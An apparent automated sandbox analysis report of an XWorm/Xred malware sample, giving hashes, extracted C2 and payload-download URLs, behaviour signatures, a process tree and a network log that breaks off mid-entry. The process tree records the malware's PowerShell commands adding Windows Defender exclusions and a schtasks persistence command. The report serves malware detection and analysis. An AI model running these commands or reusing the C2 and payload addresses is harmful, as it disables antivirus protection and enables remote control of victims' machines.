Overview

overview

10

Static

static

10

Xworm.exe

windows7-x64

10

Xworm.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23/01/2025, 13:53 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Xworm.exe

  • Size

    828KB

  • MD5

    f2dba5b93fa78fe0357cae18d68bc13f

  • SHA1

    686e5e1ae65116c4d22315b15992163ad4d34f7c

  • SHA256

    0d8cc0a75238c05e1b072683ee43d7e0bf827dde7a652df1467333a2b1f6a570

  • SHA512

    cc9714c48fc9c36f98ec2230e96efd5016c254059cf23ea7ccf318e3e44337559e6f5f48d5b9367a10c5b87bd05df6345c58c64eb728769f649b2411f4dc3970

  • SSDEEP

    12288:pMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9rR0uvsj:pnsJ39LyjbJkQFMhmC+6GD9Fl0

Score
10/10
xredxwormbackdoordiscoveryexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

C2

simply-exotic.gl.at.ply.gg:27183

Attributes
  • Install_directory

    %Temp%

  • install_file

    Windows.exe

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    xredline1@gmail.com

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Signatures

  • Detect Xworm Payload 6 IoCs
  • Xred

    Xred is backdoor written in Delphi.

    backdoorxred
  • Xred family
    xred
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\Xworm.exe
    "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:5092
    • C:\Users\Admin\AppData\Local\Temp\._cache_Xworm.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_Xworm.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:532
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\._cache_Xworm.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:844
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_Xworm.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\User'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2636
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'User'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2544
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "User" /tr "C:\Users\Admin\AppData\Local\Temp\User"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4828
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /delete /f /tn "User"
        3⤵
          PID:2268
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDAFE.tmp.bat""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1524
          • C:\Windows\system32\timeout.exe
            timeout 3
            4⤵
            • Delays execution with timeout.exe
            PID:3172
      • C:\ProgramData\Synaptics\Synaptics.exe
        "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:4180
        • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
          "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2884
    • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
      1⤵
      • Checks processor information in registry
      • Enumerates system info in registry
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      PID:4872

    Network

    • flag-us
      DNS
      58.55.71.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      58.55.71.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      73.159.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      73.159.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      3.108.50.23.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      3.108.50.23.in-addr.arpa
      IN PTR
      Response
      3.108.50.23.in-addr.arpa
      IN PTR
      a23-50-108-3deploystaticakamaitechnologiescom
    • flag-us
      DNS
      ip-api.com
      ._cache_Xworm.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • flag-us
      GET
      http://ip-api.com/line/?fields=hosting
      ._cache_Xworm.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /line/?fields=hosting HTTP/1.1
      Host: ip-api.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 23 Jan 2025 13:54:00 GMT
      Content-Type: text/plain; charset=utf-8
      Content-Length: 6
      Access-Control-Allow-Origin: *
      X-Ttl: 60
      X-Rl: 44
    • flag-us
      DNS
      46.28.109.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      46.28.109.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      1.112.95.208.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      1.112.95.208.in-addr.arpa
      IN PTR
      Response
      1.112.95.208.in-addr.arpa
      IN PTR
      ip-apicom
    • flag-us
      DNS
      xred.mooo.com
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      xred.mooo.com
      IN A
      Response
    • flag-us
      DNS
      freedns.afraid.org
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      freedns.afraid.org
      IN A
      Response
      freedns.afraid.org
      IN A
      69.42.215.252
    • flag-us
      GET
      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
      Synaptics.exe
      Remote address:
      69.42.215.252:80
      Request
      GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
      User-Agent: MyApp
      Host: freedns.afraid.org
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Thu, 23 Jan 2025 13:54:01 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding
      X-Cache: MISS
    • flag-us
      DNS
      104.246.116.51.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      104.246.116.51.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      252.215.42.69.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      252.215.42.69.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      252.215.42.69.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      252.215.42.69.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      simply-exotic.gl.at.ply.gg
      ._cache_Xworm.exe
      Remote address:
      8.8.8.8:53
      Request
      simply-exotic.gl.at.ply.gg
      IN A
      Response
      simply-exotic.gl.at.ply.gg
      IN A
      147.185.221.25
    • flag-us
      DNS
      25.221.185.147.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      25.221.185.147.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      241.150.49.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      241.150.49.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      50.23.12.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      50.23.12.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      77.190.18.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      77.190.18.2.in-addr.arpa
      IN PTR
      Response
      77.190.18.2.in-addr.arpa
      IN PTR
      a2-18-190-77deploystaticakamaitechnologiescom
    • flag-us
      DNS
      docs.google.com
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      docs.google.com
      IN A
      Response
      docs.google.com
      IN A
      216.58.212.206
    • flag-gb
      GET
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      216.58.212.206:443
      Request
      GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: docs.google.com
      Cache-Control: no-cache
      Response
      HTTP/1.1 303 See Other
      Content-Type: application/binary
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Thu, 23 Jan 2025 13:55:01 GMT
      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Strict-Transport-Security: max-age=31536000
      Cross-Origin-Opener-Policy: same-origin
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy: script-src 'report-sample' 'nonce-h2oR3qdEH3SnNZgXQmgaMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Server: ESF
      Content-Length: 0
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-gb
      GET
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      216.58.212.206:443
      Request
      GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: docs.google.com
      Cache-Control: no-cache
      Cookie: NID=520=qT5TBmR0Ql8DVyR9-AXW6sWpZeC4Gorav6CMLlthzmE4JBzBSaCpmcLZURL8Lymce4OnBzioCBdtbgdDyB1KPKF41RXtnS6ZRfm0oLf7OOY3WO4dWYt_RKCMm6UxfCoCThSVV7ok30YD32e8PC7jhu--95HATx-FIYJn9MxMaw8qej0NL5T5MveBTg
      Response
      HTTP/1.1 303 See Other
      Content-Type: application/binary
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Thu, 23 Jan 2025 13:55:01 GMT
      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Strict-Transport-Security: max-age=31536000
      Cross-Origin-Opener-Policy: same-origin
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy: script-src 'report-sample' 'nonce-fSRn39ResUQrGTYJTHF4jA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Server: ESF
      Content-Length: 0
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-gb
      GET
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      216.58.212.206:443
      Request
      GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: docs.google.com
      Cache-Control: no-cache
      Cookie: NID=520=qT5TBmR0Ql8DVyR9-AXW6sWpZeC4Gorav6CMLlthzmE4JBzBSaCpmcLZURL8Lymce4OnBzioCBdtbgdDyB1KPKF41RXtnS6ZRfm0oLf7OOY3WO4dWYt_RKCMm6UxfCoCThSVV7ok30YD32e8PC7jhu--95HATx-FIYJn9MxMaw8qej0NL5T5MveBTg
      Response
      HTTP/1.1 303 See Other
      Content-Type: application/binary
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Thu, 23 Jan 2025 13:55:01 GMT
      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Strict-Transport-Security: max-age=31536000
      Content-Security-Policy: script-src 'report-sample' 'nonce-JjYuTwwnQILOysQP6gEPig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Cross-Origin-Opener-Policy: same-origin
      Server: ESF
      Content-Length: 0
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-us
      DNS
      c.pki.goog
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      c.pki.goog
      IN A
      Response
      c.pki.goog
      IN CNAME
      pki-goog.l.google.com
      pki-goog.l.google.com
      IN A
      142.250.187.227
    • flag-gb
      GET
      http://c.pki.goog/r/r1.crl
      Synaptics.exe
      Remote address:
      142.250.187.227:80
      Request
      GET /r/r1.crl HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: c.pki.goog
      Response
      HTTP/1.1 200 OK
      Accept-Ranges: bytes
      Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
      Cross-Origin-Resource-Policy: cross-origin
      Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
      Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
      Content-Length: 854
      X-Content-Type-Options: nosniff
      Server: sffe
      X-XSS-Protection: 0
      Date: Thu, 23 Jan 2025 13:34:28 GMT
      Expires: Thu, 23 Jan 2025 14:24:28 GMT
      Cache-Control: public, max-age=3000
      Age: 1232
      Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
      Content-Type: application/pkix-crl
      Vary: Accept-Encoding
    • flag-us
      DNS
      o.pki.goog
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      o.pki.goog
      IN A
      Response
      o.pki.goog
      IN CNAME
      pki-goog.l.google.com
      pki-goog.l.google.com
      IN A
      142.250.187.227
    • flag-gb
      GET
      http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDREXAZkIcRFgn9FoWvtnQ0
      Synaptics.exe
      Remote address:
      142.250.187.227:80
      Request
      GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDREXAZkIcRFgn9FoWvtnQ0 HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: o.pki.goog
      Response
      HTTP/1.1 200 OK
      Server: ocsp_responder
      Content-Length: 472
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      Date: Thu, 23 Jan 2025 13:51:16 GMT
      Cache-Control: public, max-age=14400
      Content-Type: application/ocsp-response
      Age: 224
    • flag-gb
      GET
      http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCtrC6LRgin8QlSmIIYAEvj
      Synaptics.exe
      Remote address:
      142.250.187.227:80
      Request
      GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCtrC6LRgin8QlSmIIYAEvj HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: o.pki.goog
      Response
      HTTP/1.1 200 OK
      Server: ocsp_responder
      Content-Length: 472
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      Date: Thu, 23 Jan 2025 13:37:30 GMT
      Cache-Control: public, max-age=14400
      Content-Type: application/ocsp-response
      Age: 1051
    • flag-us
      DNS
      drive.usercontent.google.com
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      drive.usercontent.google.com
      IN A
      Response
      drive.usercontent.google.com
      IN A
      216.58.204.65
    • flag-gb
      GET
      https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      216.58.204.65:443
      Request
      GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Cache-Control: no-cache
      Host: drive.usercontent.google.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      X-GUploader-UploadID: AFIdbgQlvoqyjjaSxU-xGklzde1XHMvWtL5givXFcqqHNNKl9eAg-bh4BM5jER_VwM3RAbZQJwZ_KGI
      Content-Type: text/html; charset=utf-8
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Thu, 23 Jan 2025 13:55:01 GMT
      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
      Content-Security-Policy: script-src 'report-sample' 'nonce-49BmgsfRwXCqoVATO6XLHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Cross-Origin-Opener-Policy: same-origin
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Content-Length: 1652
      Server: UploadServer
      Set-Cookie: NID=520=qT5TBmR0Ql8DVyR9-AXW6sWpZeC4Gorav6CMLlthzmE4JBzBSaCpmcLZURL8Lymce4OnBzioCBdtbgdDyB1KPKF41RXtnS6ZRfm0oLf7OOY3WO4dWYt_RKCMm6UxfCoCThSVV7ok30YD32e8PC7jhu--95HATx-FIYJn9MxMaw8qej0NL5T5MveBTg; expires=Fri, 25-Jul-2025 13:55:01 GMT; path=/; domain=.google.com; HttpOnly
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      Content-Security-Policy: sandbox allow-scripts
    • flag-gb
      GET
      https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      216.58.204.65:443
      Request
      GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Cache-Control: no-cache
      Host: drive.usercontent.google.com
      Connection: Keep-Alive
      Cookie: NID=520=qT5TBmR0Ql8DVyR9-AXW6sWpZeC4Gorav6CMLlthzmE4JBzBSaCpmcLZURL8Lymce4OnBzioCBdtbgdDyB1KPKF41RXtnS6ZRfm0oLf7OOY3WO4dWYt_RKCMm6UxfCoCThSVV7ok30YD32e8PC7jhu--95HATx-FIYJn9MxMaw8qej0NL5T5MveBTg
      Response
      HTTP/1.1 404 Not Found
      X-GUploader-UploadID: AFIdbgQEh_70GHVAFB4RrTNCw_l7uJyjeFUbv6zkEthG1JxdJG708hWTIlUev2YR4RvYMfki6Wtvuro
      Content-Type: text/html; charset=utf-8
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Thu, 23 Jan 2025 13:55:01 GMT
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy: script-src 'report-sample' 'nonce-ElEm-gKodoEMgL6uqbVfbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Cross-Origin-Opener-Policy: same-origin
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Content-Length: 1652
      Server: UploadServer
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      Content-Security-Policy: sandbox allow-scripts
    • flag-gb
      GET
      https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      216.58.204.65:443
      Request
      GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Cache-Control: no-cache
      Host: drive.usercontent.google.com
      Connection: Keep-Alive
      Cookie: NID=520=qT5TBmR0Ql8DVyR9-AXW6sWpZeC4Gorav6CMLlthzmE4JBzBSaCpmcLZURL8Lymce4OnBzioCBdtbgdDyB1KPKF41RXtnS6ZRfm0oLf7OOY3WO4dWYt_RKCMm6UxfCoCThSVV7ok30YD32e8PC7jhu--95HATx-FIYJn9MxMaw8qej0NL5T5MveBTg
      Response
      HTTP/1.1 404 Not Found
      X-GUploader-UploadID: AFIdbgRpt7Ki3cy0jnmum68tPJhFnBifpNY2cKIBdzjzWGopI4vai1ZkhuRMAtPTvcrwSv3lyDYKRTw
      Content-Type: text/html; charset=utf-8
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Thu, 23 Jan 2025 13:55:02 GMT
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Content-Security-Policy: script-src 'report-sample' 'nonce-LUNYKZQ3DSmOu5AcrdxiIQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Cross-Origin-Opener-Policy: same-origin
      Content-Length: 1652
      Server: UploadServer
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      Content-Security-Policy: sandbox allow-scripts
    • flag-us
      DNS
      206.212.58.216.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      206.212.58.216.in-addr.arpa
      IN PTR
      Response
      206.212.58.216.in-addr.arpa
      IN PTR
      ams16s21-in-f141e100net
      206.212.58.216.in-addr.arpa
      IN PTR
      lhr25s27-in-f14�I
      206.212.58.216.in-addr.arpa
      IN PTR
      ams16s21-in-f206�I
    • flag-us
      DNS
      227.187.250.142.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      227.187.250.142.in-addr.arpa
      IN PTR
      Response
      227.187.250.142.in-addr.arpa
      IN PTR
      lhr25s34-in-f31e100net
    • flag-us
      DNS
